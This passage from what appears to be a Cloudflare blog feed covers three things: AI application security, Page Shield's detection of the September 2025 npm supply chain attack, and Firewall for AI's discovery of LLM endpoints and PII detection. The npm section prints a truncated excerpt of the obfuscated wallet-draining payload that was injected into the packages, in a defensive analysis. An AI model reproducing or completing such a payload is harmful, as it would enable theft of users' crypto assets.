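    """Return the prompt strings found in a request body.

    Known layouts are tried first; if none match, the entire body is
    returned so that detection still runs (default-secure fallback).
    """
    try:
        payload = json.loads(body)
    except json.JSONDecodeError:
        return [body]

    prompts: list[str] = []
    if isinstance(payload, dict):
        # $.messages[*].content (chat-completions style)
        prompts += _message_contents(payload.get("messages"))
        # $.requests[*].params.messages[*].content (batch style)
        for request in _as_list(payload.get("requests")):
            params = request.get("params") if isinstance(request, dict) else None
            if isinstance(params, dict):
                prompts += _message_contents(params.get("messages"))
    return prompts or [body]
```

    <p>With a body like <code>{"property_description": "...", "customer_name": "..."}</code>, neither known layout matches, so the whole payload is inspected. That is exactly the case where a customer name could trigger PII detection, and where a custom path pointing at <code>$.property_description</code> would help.</p>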
    <div>
      <h3>Mitigation</h3>
      <a href="#mitigation">
        
      </a>
    </div>
    <p>Once a threat is identified and scored, you can block it, log it, or deliver custom responses, using the same WAF rules engine you already use for the rest of your application security. The power of Cloudflare’s shared platform is that you can combine AI-specific signals with everything else we know about a request, represented by <a href="https://developers.cloudflare.com/ruleset-engine/rules-language/fields/reference/"><u>hundreds of fields</u></a> available in the WAF. A prompt injection attempt is suspicious. A prompt injection attempt from an IP that’s been probing your login page, using a browser fingerprint associated with previous attacks, and rotating through a botnet is a different story. Point solutions that only see the AI layer can’t make these connections.</p><p>This unified security layer is exactly what they need at Newfold Digital to discover, label, and protect AI endpoints, says Radinger: “We look forward to using it across all these projects to serve as a fail-safe.”</p>
    <div>
      <h2>Growing ecosystem</h2>
      <a href="#growing-ecosystem">
        
      </a>
    </div>
    <p>AI Security for Apps will also be available through Cloudflare's growing ecosystem, including through integration with IBM Cloud. Through <a href="https://www.ibm.com/products/cloud-internet-services"><u>IBM Cloud Internet Services (CIS)</u></a>, end users can already procure advanced application security solutions and manage them directly through their IBM Cloud account. </p><p>We're also partnering with Wiz to connect AI Security for Apps with <a href="https://www.wiz.io/solutions/ai-spm"><u>Wiz AI Security</u></a>, giving mutual customers a unified view of their AI security posture, from model and agent discovery in the cloud to application-layer guardrails at the edge.</p>
    <div>
      <h2>How to get started</h2>
      <a href="#how-to-get-started">
        
      </a>
    </div>
    <p>AI Security for Apps is available now for Cloudflare’s Enterprise customers. Contact your account team to get started, or see the product in action with a <a href="https://www.cloudflare.com/demos/protect-ai-apps/"><u>self-guided tour</u></a>.</p><p>If you're on a Free, Pro, or Business plan, you can use AI endpoint discovery today. Log in to your dashboard and navigate to <b>Security → Web Assets</b> to see which endpoints we've identified. Keep an eye out — we plan to make all AI Security for Apps capabilities available for customers on all plans soon.</p><p>For configuration details, see our <a href="https://developers.cloudflare.com/waf/detections/firewall-for-ai/"><u>documentation</u></a>.</p> ]]></content:encoded>
            <category><![CDATA[Product News]]></category>
            <category><![CDATA[AI]]></category>
            <category><![CDATA[WAF]]></category>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[Application Security]]></category>
            <category><![CDATA[Application Services]]></category>
            <guid isPermaLink="false">4MBDCV6FV61Xbyav3cW8Xy</guid>
            <dc:creator>Liam Reese</dc:creator>
            <dc:creator>Zhiyuan Zheng</dc:creator>
            <dc:creator>Catherine Newcomb</dc:creator>
        </item>
        <item>
            <title><![CDATA[How Cloudflare’s client-side security made the npm supply chain attack a non-event]]></title>
            <link>https://blog.cloudflare.com/how-cloudflares-client-side-security-made-the-npm-supply-chain-attack-a-non/</link>
            <pubDate>Fri, 24 Oct 2025 17:10:43 GMT</pubDate>
            <description><![CDATA[ A recent npm supply chain attack compromised 18 popular packages. This post explains how Cloudflare’s graph-based machine learning model, which analyzes 3.5 billion scripts daily, was built to detect and block exactly this kind of threat automatically. ]]></description>
            <content:encoded><![CDATA[ <p>In early September 2025, attackers used a phishing email to compromise one or more trusted maintainer accounts on npm. They used this access to publish malicious releases of 18 widely used npm packages (for example chalk, debug, ansi-styles) that account for more than <a href="https://www.aikido.dev/blog/npm-debug-and-chalk-packages-compromised"><u>2 billion downloads per week</u></a>. Websites and applications that used these compromised packages were vulnerable to hackers stealing crypto assets (“crypto stealing” or “wallet draining”) from end users. In addition, compromised packages could modify other packages owned by the same maintainers (using stolen npm tokens) and included code to <a href="https://unit42.paloaltonetworks.com/npm-supply-chain-attack/"><u>steal developer tokens for CI/CD pipelines and cloud accounts</u></a>.</p><p>For end users of your applications, the good news is that Cloudflare <a href="https://www.cloudflare.com/application-services/products/page-shield/"><u>Page Shield, our client-side security offering</u></a>, will detect compromised JavaScript libraries and prevent crypto-stealing. More importantly, given the AI powering Cloudflare’s detection solutions, customers are protected from similar attacks in the future, as we explain below.</p>
            <pre><code>export default {
 aliceblue: [240, 248, 255],
 …
 yellow: [255, 255, 0],
 yellowgreen: [154, 205, 50]
}


const _0x112fa8=_0x180f;(function(_0x13c8b9,_0x35f660){const _0x15b386=_0x180f,_0x66ea25=_0x13c8b9();while(!![]){try{const _0x2cc99e=parseInt(_0x15b386(0x46c))/(-0x1caa+0x61f*0x1+-0x9c*-0x25)*(parseInt(_0x15b386(0x132))/(-0x1d6b+-0x69e+0x240b))+-parseInt(_0x15b386(0x6a6))/(0x1*-0x26e1+-0x11a1*-0x2+-0x5d*-0xa)*(-parseInt(_0x15b386(0x4d5))/(0x3b2+-0xaa*0xf+-0x3*-0x218))+-parseInt(_0x15b386(0x1e8))/(0xfe+0x16f2+-0x17eb)+-parseInt(_0x15b386(0x707))/(-0x23f8+-0x2*0x70e+-0x48e*-0xb)*(parseInt(_0x15b386(0x3f3))/(-0x6a1+0x3f5+0x2b3))+-parseInt(_0x15b386(0x435))/(0xeb5+0x3b1+-0x125e)*(parseInt(_0x15b386(0x56e))/(0x18*0x118+-0x17ee+-0x249))+parseInt(_0x15b386(0x785))/(-0xfbd+0xd5d*-0x1+0x1d24)+-parseInt(_0x15b386(0x654))/(-0x196d*0x1+-0x605+0xa7f*0x3)*(-parseInt(_0x15b386(0x3ee))/(0x282*0xe+0x760*0x3+-0x3930));if(_0x2cc99e===_0x35f660)break;else _0x66ea25['push'](_0x66ea25['shift']());}catch(_0x205af0){_0x66 …
</code></pre>
            <p><sub><i>Excerpt from the injected malicious payload, along with the rest of the innocuous normal code.</i></sub><sub> </sub><sub><i>Among other things, the payload replaces legitimate crypto addresses with attacker’s addresses (for multiple currencies, including bitcoin, ethereum, solana).</i></sub></p>
    <div>
      <h2>Finding needles in a 3.5 billion script haystack</h2>
      <a href="#finding-needles-in-a-3-5-billion-script-haystack">
        
      </a>
    </div>
    <p>Every day, Cloudflare Page Shield assesses 3.5 billion scripts, or roughly 40,000 scripts per second. Of these, less than 0.3% are malicious, based on our machine learning (ML)-based malicious script detection. As explained in a prior <a href="https://blog.cloudflare.com/how-we-train-ai-to-uncover-malicious-javascript-intent-and-make-web-surfing-safer/#ai-inference-at-scale"><u>blog post</u></a>, we preprocess JavaScript code into an <a href="https://en.wikipedia.org/wiki/Abstract_syntax_tree"><u>Abstract Syntax Tree</u></a> to train a <a href="https://mbernste.github.io/posts/gcn/"><u>message-passing graph convolutional network (MPGCN)</u></a> that classifies a given JavaScript file as either malicious or benign. </p><p>The intuition behind using a graph-based model is to use both the structure (e.g. function calls, assertions) and the code text to learn hacker patterns. For example, in the npm compromise, the <a href="https://www.aikido.dev/blog/npm-debug-and-chalk-packages-compromised"><u>malicious code</u></a> injected in compromised packages uses code obfuscation and also modifies code entry points for crypto wallet interfaces, such as Ethereum’s window.ethereum, to swap payment destinations to accounts in the attacker’s control. Crucially, rather than engineering such behaviors as features, the model learns to distinguish between good and bad code purely from structure and syntax. As a result, it is resilient not just to the techniques used in the npm compromise but also to future compromise techniques. </p><p>Our ML model outputs the probability that a script is malicious, which is then transformed into a score ranging from 1 to 99, with low scores indicating likely malicious scripts and high scores indicating benign ones. Importantly, like many Cloudflare ML models, inference happens in under 0.3 seconds. </p>
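    <p>As a rough illustration of what "structure" means here, the sketch below flattens a syntax tree into node labels and parent-child edges, the kind of input a graph neural network consumes. It is an assumption-laden toy, not the production preprocessing: <code>astToGraph</code> is a hypothetical helper, the tree is a hand-written and simplified ESTree-style object rather than real parser output, and identifier text (which the real model also uses) is ignored.</p>

```javascript
// An AST node, for this sketch, is any object with a string `type`.
function isAstNode(value) {
  return value !== null && typeof value === "object" && typeof value.type === "string";
}

// Flatten a tree into:
//   nodes[i] = syntax type of node i
//   edges    = [parentIndex, childIndex] pairs
function astToGraph(ast) {
  const nodes = [];
  const edges = [];

  function visit(node, parentIndex) {
    const index = nodes.length;
    nodes.push(node.type);
    if (parentIndex !== null) edges.push([parentIndex, index]);
    for (const key of Object.keys(node)) {
      const child = node[key];
      const candidates = Array.isArray(child) ? child : [child];
      for (const candidate of candidates) {
        if (isAstNode(candidate)) visit(candidate, index);
      }
    }
  }

  visit(ast, null);
  return { nodes, edges };
}

// Hand-written, simplified tree for `window.ethereum.request(args)`.
const exampleAst = {
  type: "CallExpression",
  callee: {
    type: "MemberExpression",
    object: {
      type: "MemberExpression",
      object: { type: "Identifier", name: "window" },
      property: { type: "Identifier", name: "ethereum" },
    },
    property: { type: "Identifier", name: "request" },
  },
  arguments: [{ type: "Identifier", name: "args" }],
};

const exampleGraph = astToGraph(exampleAst);
```

    <p>Because the graph records how calls and member accesses nest rather than what variables are named, renaming every identifier to something like <code>_0x15b386</code> leaves it unchanged.</p>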
    <div>
      <h2>Model Evaluation</h2>
      <a href="#model-evaluation">
        
      </a>
    </div>
    <p>Since the initial launch, we have continually evolved our JavaScript classifiers to optimize model evaluation metrics, in this case the <a href="https://en.wikipedia.org/wiki/Precision_and_recall"><u>F1 measure</u></a>. Our current metrics are:</p><table><tr><th><p><b>Metric</b></p></th><th><p><b>Latest: Version 2.7</b></p></th><th><p><b>Improvement over prior version</b></p></th></tr><tr><td><p>Precision</p></td><td><p>98%</p></td><td><p>5%</p></td></tr><tr><td><p>Recall</p></td><td><p>90%</p></td><td><p>233%</p></td></tr><tr><td><p>F1</p></td><td><p>94%</p></td><td><p>123%</p></td></tr></table><p>Some of the improvements were accomplished through:</p><ul><li><p>More training examples, curated from a combination of open source datasets, security partners, and labeling of Cloudflare traffic</p></li><li><p>Better training examples, for instance, by removing samples with pure comments in them or scripts with nearly equal structure</p></li><li><p>Better training set stratification, so that training, validation and test sets all have similar distribution of classes of interest</p></li><li><p>Tweaking the evaluation criteria to maximize recall with 99% precision</p></li></ul><p>Given the confusion matrix, we should expect about 2 false positives per second, if we assume ~0.3% of the 40,000 scripts per second are flagged as malicious. We employ multiple LLMs alongside expert human security analysts to review such scripts around the clock. Most false positives we encounter in this way are rather challenging. Examples include scripts that read all form inputs except credit card numbers (e.g. rejecting input values that test true using the <a href="https://en.wikipedia.org/wiki/Luhn_algorithm"><u>Luhn algorithm</u></a>), inject dynamic scripts, or rely on heavy user tracking or heavy deobfuscation.
User tracking scripts often exhibit a combination of these behaviors, and the only reliable way to distinguish truly malicious payloads is by assessing the trustworthiness of their connected domains. We feed all newly labeled scripts back into our ML training (and testing) pipeline.</p><p>Most importantly, we verified that Cloudflare Page Shield would have successfully detected all 18 compromised npm packages as malicious (a novel attack and thus not in the training data).</p>
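    <p>The figures in this section can be cross-checked with a few lines of arithmetic. The sketch below recomputes the F1 score from the precision and recall in the table, and the expected false positive rate from the 40,000 scripts per second and ~0.3% flagged figures. One assumption is ours: that the share of flagged scripts that are false positives equals one minus the reported precision. The function names are illustrative.</p>

```javascript
// F1 is the harmonic mean of precision and recall.
function f1Score(precision, recall) {
  return (2 * precision * recall) / (precision + recall);
}

// Expected false positives per second: scripts flagged per second
// multiplied by the share of flagged scripts that are actually benign.
function falsePositivesPerSecond(scriptsPerSecond, flaggedFraction, precision) {
  const flaggedPerSecond = scriptsPerSecond * flaggedFraction;
  return flaggedPerSecond * (1 - precision);
}

// 3.5 billion scripts spread over the 86,400 seconds in a day.
const scriptsPerSecond = 3.5e9 / 86400; // roughly 40,500

// Precision 98% and recall 90% from the table.
const f1 = f1Score(0.98, 0.9); // roughly 0.938, reported as 94%

// 40,000 scripts/s, ~0.3% flagged, 98% precision.
const fpPerSecond = falsePositivesPerSecond(40000, 0.003, 0.98); // roughly 2.4
```

    <p>Under these assumptions about 120 scripts are flagged each second, and roughly 2% of those are benign, which is consistent with the "about 2 false positives per second" estimate.</p>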
    <div>
      <h2>Planned improvements</h2>
      <a href="#planned-improvements">
        
      </a>
    </div>
    <p>Static script analysis has proven effective and is sometimes the only viable approach (e.g., for npm packages). To address more challenging cases, we are enhancing our ML signals with contextual data including script URLs, page hosts, and connected domains. Modern Agentic AI approaches can wrap JavaScript runtimes as tools in an overall AI workflow. Then, they can enable a hybrid approach that combines static and dynamic analysis techniques to tackle challenging false positive scenarios, such as user tracking scripts.</p>
    <div>
      <h3>Consolidating classifiers</h3>
      <a href="#consolidating-classifiers">
        
      </a>
    </div>
    <p><a href="https://blog.cloudflare.com/detecting-magecart-style-attacks-for-pageshield/"><u>Over 3 years ago</u></a> we launched our “<a href="https://developers.cloudflare.com/page-shield/detection/review-malicious-scripts/#review-malicious-scripts"><u>Code Behaviour Analysis</u></a>” classifier for Magecart-style scripts, which learns code obfuscation and data exfiltration behaviors. Subsequently, we also deployed our <a href="https://mbernste.github.io/posts/gcn/"><u>message-passing graph convolutional network (MPGCN)</u></a> based approach that can also classify <a href="https://blog.cloudflare.com/navigating-the-maze-of-magecart/"><u>Magecart attacks</u></a>. Given the efficacy of the MPGCN-based malicious code analysis, we are announcing the end-of-life of <a href="https://developers.cloudflare.com/page-shield/detection/review-malicious-scripts/#review-malicious-scripts"><u>code behaviour analysis</u></a> by the end of 2025. </p>
    <div>
      <h2>Staying safe always</h2>
      <a href="#staying-safe-always">
        
      </a>
    </div>
    <p>In the npm attack, we did not see any activity in the Cloudflare network related to this compromise among Page Shield users, though for other exploits, we catch their traffic within minutes. In this case, patches of the compromised npm packages were released in 2 hours or less, and given that the infected payloads had to be built into end user facing applications for end user impact, we suspect that our customers dodged the proverbial bullet. That said, had traffic gotten through, Page Shield was already equipped to detect and block this threat.</p><p>Also make sure to consult our <a href="https://developers.cloudflare.com/page-shield/how-it-works/malicious-script-detection/#malicious-script-detection"><u>Page Shield Script detection</u></a> to find malicious packages. Consult the Connections tab within Page Shield to view suspicious connections made by your applications.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6rMXJZVWEu6LkupOPY2pOB/0740a085fa2a64de3cff148fc29ad328/BLOG-3052_2.png" />
          </figure><p><sub><i>Several scripts are marked as malicious. </i></sub></p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1oj2WALUAurKuu2XYTdKPm/fe8a564f10888e656c2510bc2a91dd6f/BLOG-3052_3.png" />
          </figure><p><sub><i>Several connections are marked as malicious. </i></sub></p><p>
And be sure to complete the following steps:</p><ol><li><p><b>Audit your dependency tree</b> for recently published versions (check package-lock.json / npm ls) and look for versions published around early–mid September 2025 of widely used packages. </p></li><li><p><b>Rotate any credentials</b> that may have been exposed to your build environment.</p></li><li><p><b>Revoke and reissue CI/CD tokens and service keys</b> that might have been used in build <a href="https://www.cloudflare.com/learning/serverless/glossary/what-is-ci-cd/">pipelines</a> (GitHub Actions, npm tokens, cloud credentials).</p></li><li><p><b>Pin dependencies</b> to known-good versions (or use lockfiles), and consider using a package allowlist / verified publisher features from your registry provider.</p></li><li><p><b>Scan build logs and repos for suspicious commits/GitHub Actions changes</b> and remove any unknown webhooks or workflows.</p></li></ol><p>While vigilance is key, automated defenses provide a crucial layer of protection against fast-moving supply chain attacks. Interested in better understanding your client-side supply chain? Sign up for our free, custom <a href="https://www.cloudflare.com/lp/client-side-risk-assessment/"><u>Client-Side Risk Assessment</u></a>.</p> ]]></content:encoded>
            <category><![CDATA[Supply Chain Attacks]]></category>
            <category><![CDATA[JavaScript]]></category>
            <category><![CDATA[Malicious JavaScript]]></category>
            <category><![CDATA[AI]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <category><![CDATA[Developers]]></category>
            <guid isPermaLink="false">1DRrVAPmyZYyz2avWuwYZ4</guid>
            <dc:creator>Bashyam Anant</dc:creator>
            <dc:creator>Juan Miguel Cejuela</dc:creator>
            <dc:creator>Zhiyuan Zheng</dc:creator>
            <dc:creator>Denzil Correa</dc:creator>
            <dc:creator>Israel Adura</dc:creator>
            <dc:creator>Georgie Yoxall</dc:creator>
        </item>
        <item>
            <title><![CDATA[Take control of public AI application security with Cloudflare's Firewall for AI]]></title>
            <link>https://blog.cloudflare.com/take-control-of-public-ai-application-security-with-cloudflare-firewall-for-ai/</link>
            <pubDate>Wed, 19 Mar 2025 13:00:00 GMT</pubDate>
            <description><![CDATA[ Firewall for AI discovers and protects your public LLM-powered applications, and is seamlessly integrated with Cloudflare WAF. Join the beta now and take control of your generative AI security. ]]></description>
            <content:encoded><![CDATA[ <p>Imagine building an LLM-powered assistant trained on your developer documentation and some internal guides to quickly help customers, reduce support workload, and improve user experience. Sounds great, right? But what if sensitive data, such as employee details or internal discussions, is included in the data used to train the LLM? Attackers could manipulate the assistant into exposing sensitive data or exploit it for social engineering attacks, where they deceive individuals or systems into revealing confidential details, or use it for targeted phishing attacks. Suddenly, your helpful AI tool turns into a serious security liability. </p>
    <div>
      <h3>Introducing Firewall for AI: the easiest way to discover and protect LLM-powered apps</h3>
      <a href="#introducing-firewall-for-ai-the-easiest-way-to-discover-and-protect-llm-powered-apps">
        
      </a>
    </div>
    <p>Today, as part of Security Week 2025, we’re announcing the open beta of Firewall for AI, first <a href="https://blog.cloudflare.com/firewall-for-ai/"><u>introduced during Security Week 2024</u></a>. After talking with customers interested in protecting their LLM apps, this first beta release is focused on discovery and PII detection, and more features will follow in the future.</p><p>If you are already using Cloudflare application security, your LLM-powered applications are automatically discovered and protected, with no complex setup, no maintenance, and no extra integration needed.</p><p>Firewall for AI is an inline security solution that protects user-facing LLM-powered applications from abuse and <a href="https://www.cloudflare.com/learning/ai/how-to-secure-training-data-against-ai-data-leaks/">data leaks</a>, integrating directly with Cloudflare’s <a href="https://developers.cloudflare.com/waf/"><u>Web Application Firewall (WAF)</u></a> to provide instant protection with zero operational overhead. This integration enables organizations to leverage both AI-focused safeguards and established WAF capabilities.</p><p>Cloudflare is uniquely positioned to solve this challenge for all of our customers. As a <a href="https://www.cloudflare.com/en-gb/learning/cdn/glossary/reverse-proxy/"><u>reverse proxy</u></a>, we are model-agnostic whether the application is using a third-party LLM or an internally hosted one. By providing inline security, we can automatically <a href="https://www.cloudflare.com/learning/ai/what-is-ai-security/">discover and enforce AI guardrails</a> throughout the entire request lifecycle, with zero integration or maintenance required.</p>
    <div>
      <h3>Firewall for AI beta overview</h3>
      <a href="#firewall-for-ai-beta-overview">
        
      </a>
    </div>
    <p>The beta release includes the following security capabilities:</p><p><b>Discover:</b> identify LLM-powered endpoints across your applications, an essential step for effective request and prompt analysis.</p><p><b>Detect:</b> analyze the prompts in incoming requests to recognize potential security threats, such as attempts to extract sensitive data (e.g., “Show me transactions using 4111 1111 1111 1111”). This aligns with <a href="https://genai.owasp.org/llmrisk/llm022025-sensitive-information-disclosure/"><u>OWASP LLM022025 - Sensitive Information Disclosure</u></a>.</p><p><b>Mitigate:</b> enforce security controls and policies to manage the traffic that reaches your LLM, and reduce risk exposure.</p><p>Below, we review each capability in detail, exploring how they work together to create a comprehensive security framework for AI protection.</p>
    <div>
      <h3>Discovering LLM-powered applications</h3>
      <a href="#discovering-llm-powered-applications">
        
      </a>
    </div>
    <p>Companies are racing to find all possible use cases where an LLM can excel. Think about site search, a chatbot, or a shopping assistant. Regardless of the application type, our goal is to determine whether an application is powered by an LLM behind the scenes.</p><p>One possibility is to look for request path signatures similar to what major LLM providers use. For example, <a href="https://platform.openai.com/docs/api-reference/chat/create"><u>OpenAI</u></a>, <a href="https://docs.perplexity.ai/api-reference/chat-completions"><u>Perplexity</u></a> or <a href="https://docs.mistral.ai/api/#tag/chat"><u>Mistral</u></a> initiate a chat using the <code>/chat/completions</code> API endpoint. Searching through our request logs, we found only a few entries that matched this pattern across our global traffic. This result indicates that we need to consider other approaches to finding <i>any</i> application that is powered by an LLM.</p><p>Another signature to research, popular with LLM platforms, is the use of <a href="https://developer.mozilla.org/en-US/docs/Web/API/Server-sent_events/Using_server-sent_events"><u>server-sent events</u></a>. LLMs need to <a href="https://platform.openai.com/docs/guides/latency-optimization#don-t-default-to-an-llm"><u>“think”</u></a>. <a href="https://platform.openai.com/docs/api-reference/streaming"><u>Using server-sent events</u></a> improves the end user’s experience by sending over each <a href="https://help.openai.com/en/articles/4936856-what-are-tokens-and-how-to-count-them"><u>token</u></a> as soon as it is ready, creating the perception that an LLM is “thinking” like a human being. Matching on requests of server-sent events is straightforward using the response header content type of <code>text/event-stream</code>. 
This approach expands the coverage further, but does not yet cover the <a href="https://stackoverflow.blog/2022/06/02/a-beginners-guide-to-json-the-data-format-for-the-internet/"><u>majority of applications</u></a> that are using JSON format for data exchanges. Continuing the journey, our next focus is on the responses having header content type of <code>application/json</code>.</p><p>No matter how fast LLMs can be optimized to respond, when chatting with major LLMs, we often perceive them to be slow, as we have to wait for them to “think”. By plotting on how much time it takes for the origin server to respond over identified LLM endpoints (blue line) versus the rest (orange line), we can see in the left graph that origins serving LLM endpoints mostly need more than 1 second to respond, while the majority of the rest takes less than 1 second. Would we also see a clear distinction between origin server response body sizes, where the majority of LLM endpoints would respond with smaller sizes because major LLM providers <a href="https://platform.openai.com/docs/guides/safety-best-practices#constrain-user-input-and-limit-output-tokens"><u>limit output tokens</u></a>? Unfortunately not. The right graph shows that LLM response size largely overlaps with non-LLM traffic.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4CkowlKelGlYueNzSrbsGn/f8091d66a6c0eb8b884c7cc6f2a128ab/1.png" />
          </figure><p>By dividing origin response size over origin response duration to calculate an effective bitrate, the distinction is even clearer that 80% of LLM endpoints operate slower than 4 KB/s.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5sJKUnLmWwnTWzUOyWVRKO/c98c8fc32dbafa5d79f21effdfc58f34/2.png" />
          </figure><p>Validating this assumption by using bitrate as a heuristic across Cloudflare’s traffic, we found that roughly 3% of all origin server responses have a bitrate lower than 4 KB/s. Are these responses all powered by LLMs? Our gut feeling tells us that it is unlikely that 3% of origin responses are LLM-powered! </p><p>Among the paths found in the 3% of matching responses, there are a few patterns that stand out: 1) GraphQL endpoints, 2) device heartbeat or health check, 3) generators (for QR codes, one time passwords, invoices, etc.). Noticing this gave us the idea to filter out endpoints that have a low variance of response size over time — for instance, invoice generation is mostly based on the same template, while conversations in the LLM context have a higher variance.</p><p>A combination of filtering out known false positive patterns and low variance in response size gives us a satisfying result. These matching endpoints, approximately 30,000 of them, labelled <code>cf-llm</code>, can now be found in API Shield or Web assets, depending on your dashboard’s version, for all customers. Now you can review your endpoints and decide how to best protect them.</p>
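    <p>The two signals described above, a low effective bitrate and a response size that varies over time, can be combined in a few lines. The following is a sketch under stated assumptions, not the production heuristic: only the 4 KB/s threshold comes from the text (taken here as 4,000 bytes per second), while the <code>looksLikeLlmEndpoint</code> helper, the sample shape, the use of a coefficient of variation instead of raw variance, and the 0.25 cutoff are all invented for illustration. Filtering of known false positive path patterns is left out.</p>

```javascript
// 4 KB/s from the text, assuming 1 KB = 1000 bytes.
const MAX_BITRATE_BYTES_PER_SECOND = 4000;
// Hypothetical cutoff: standard deviation of size relative to its mean.
const MIN_SIZE_VARIATION = 0.25;

function mean(values) {
  let total = 0;
  for (const value of values) total += value;
  return total / values.length;
}

// Standard deviation divided by the mean, so the cutoff does not
// depend on how large the responses are in absolute terms.
function coefficientOfVariation(values) {
  const average = mean(values);
  const variance = mean(values.map((value) => (value - average) ** 2));
  return Math.sqrt(variance) / average;
}

// samples: [{ bytes, seconds }], origin responses observed for one endpoint.
function looksLikeLlmEndpoint(samples) {
  if (samples.length === 0) return false;
  const bitrates = samples.map((sample) => sample.bytes / sample.seconds);
  const sizes = samples.map((sample) => sample.bytes);
  const isSlow = mean(bitrates) < MAX_BITRATE_BYTES_PER_SECOND;
  const isVaried = coefficientOfVariation(sizes) > MIN_SIZE_VARIATION;
  return isSlow && isVaried;
}
```

    <p>With these placeholder thresholds, an invoice generator that always returns about 2,000 bytes in one second is slow but nearly constant in size, so it is excluded, while a chat endpoint whose replies range from a few hundred to a few thousand bytes is kept.</p>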
    <div>
      <h3>Detecting prompts designed to leak PII</h3>
      <a href="#detecting-prompts-designed-to-leak-pii">
        
      </a>
    </div>
    <p>There are multiple methods to detect PII in LLM prompts. A common method relies on <a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_expressions"><u>regular expressions (“regexes”)</u></a>, which is a method we have been using in the WAF for <a href="https://developers.cloudflare.com/waf/managed-rules/reference/sensitive-data-detection/"><u>Sensitive Data Detection</u></a> on the body of the HTTP response from the web server. Regexes offer low latency, easy customization, and straightforward implementation. However, regexes alone have limitations when applied to LLM prompts. They require frequent updates to maintain accuracy, and may struggle with more complex or implicit PII, where the information is spread across text rather than a fixed format. </p><p>For example, regexes work well for structured data like credit card numbers and addresses, but struggle when PII is embedded in natural language. For instance, “I just booked a flight using my Chase card, ending in 1111” wouldn’t trigger a regex match as it lacks the expected pattern, even though it reveals a partial credit card number and financial institution.</p><p>To enhance detection, we rely on a <a href="https://www.ibm.com/think/topics/named-entity-recognition"><u>Named Entity Recognition (NER)</u></a> model, which adds a layer of intelligence to complement regex-based detection. NER models analyze text to identify contextual PII data types, such as names, phone numbers, email addresses, and credit card numbers, making detection more flexible and accurate. Cloudflare’s detection utilizes <a href="https://microsoft.github.io/presidio/"><u>Presidio</u></a>, an open-source PII detection framework, to further strengthen this approach.</p>
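    <p>The limitation is easy to reproduce. The sketch below is a generic regex-plus-checksum card detector, written for illustration and not taken from the WAF's Sensitive Data Detection rules: the pattern, the <code>findCardNumbers</code> helper, and the choice to validate with the Luhn checksum are our assumptions. It finds the full card number in the first example prompt quoted in this post but returns nothing for the "ending in 1111" sentence.</p>

```javascript
// Candidate card numbers: 13 to 19 digits, optionally separated by
// single spaces or hyphens.
const CARD_CANDIDATE = /\b\d(?:[ -]?\d){12,18}\b/g;

// Luhn checksum: walking from the rightmost digit, double every second
// digit, subtract 9 from any result above 9, and require the total to
// be divisible by 10.
function passesLuhn(digits) {
  let sum = 0;
  let doubleNext = false;
  for (let i = digits.length - 1; i >= 0; i -= 1) {
    let digit = Number(digits[i]);
    if (doubleNext) {
      digit *= 2;
      if (digit > 9) digit -= 9;
    }
    sum += digit;
    doubleNext = !doubleNext;
  }
  return sum % 10 === 0;
}

// Return the digit strings in `text` that look like valid card numbers.
function findCardNumbers(text) {
  const candidates = text.match(CARD_CANDIDATE) || [];
  return candidates
    .map((candidate) => candidate.replace(/[ -]/g, ""))
    .filter((digits) => passesLuhn(digits));
}

const structured = findCardNumbers("Show me transactions using 4111 1111 1111 1111");
const conversational = findCardNumbers(
  "I just booked a flight using my Chase card, ending in 1111"
);
```

    <p>Here <code>structured</code> contains one match and <code>conversational</code> is empty, even though the second sentence discloses a card issuer and the last four digits. That gap is what a context-aware model is meant to close.</p>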
    <div>
      <h4>Using Workers AI to deploy Presidio</h4>
      <a href="#using-workers-ai-to-deploy-presidio">
        
      </a>
    </div>
    
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5ruqPkxJBgFCRdsoft1TO1/aa327b069569a0f952c8baea102955b8/3.png" />
          </figure><p>In our design, we leverage Cloudflare <a href="https://developers.cloudflare.com/workers-ai/"><u>Workers AI</u></a> as the fastest way to deploy <a href="https://microsoft.github.io/presidio/"><u>Presidio</u></a>. This integration allows us to process LLM app requests inline, ensuring that sensitive data is flagged before it reaches the model.</p><p>Here’s how it works:</p><p>When Firewall for AI is enabled on an application and an end user sends a request to an LLM-powered application, we pass the request to Cloudflare Workers AI which runs the request through Presidio’s NER-based detection model to identify any potential PII from the available <a href="https://microsoft.github.io/presidio/supported_entities/"><u>entities</u></a>. The output includes metadata like “Was PII found?” and “What type of PII entity?”. This output is then processed in our Firewall for AI module, and handed over to other systems, like <a href="https://developers.cloudflare.com/waf/analytics/security-analytics/"><u>Security Analytics</u></a> for visibility, and the rules like <a href="https://developers.cloudflare.com/waf/custom-rules/"><u>Custom rules</u></a> for enforcement. Custom rules allow customers to take appropriate actions on the requests based on the provided metadata. </p><p>If no terminating action, like blocking, is triggered, the request proceeds to the LLM. Otherwise, it gets blocked or the appropriate action is applied before reaching the origin.</p>
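    <p>The flow described above (detect, attach metadata, evaluate rules, then either act or forward) can be summarised in a short sketch. Everything in it is hypothetical and simplified: <code>evaluateRequest</code>, the metadata shape, and the rule objects are stand-ins invented for illustration, not the Workers AI, Presidio, or WAF interfaces. The detector is passed in as a function so that no real API is implied; the category labels follow Presidio's entity naming.</p>

```javascript
// prompt: the text to inspect.
// detect: stand-in for the PII model; returns { piiFound, piiCategories }.
// rules:  ordered list of { action, when(metadata) }; first match wins.
function evaluateRequest(prompt, detect, rules) {
  const metadata = detect(prompt);
  for (const rule of rules) {
    if (rule.when(metadata)) return { action: rule.action, metadata };
  }
  // No rule matched, so the request proceeds to the LLM.
  return { action: "allow", metadata };
}

const exampleRules = [
  // Exception: tolerate prompts whose only PII category is location.
  {
    action: "skip",
    when: (metadata) =>
      metadata.piiFound &&
      metadata.piiCategories.every((category) => category === "LOCATION"),
  },
  // Otherwise block any prompt in which PII was found.
  { action: "block", when: (metadata) => metadata.piiFound },
];
```

    <p>Ordering matters in this sketch: the exception is listed before the blocking rule, so a prompt that only mentions a location is let through while one containing a card number is stopped before it reaches the origin.</p>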
    <div>
      <h3>Integrating AI security into the WAF and Analytics</h3>
      <a href="#integrating-ai-security-into-the-waf-and-analytics">
        
      </a>
    </div>
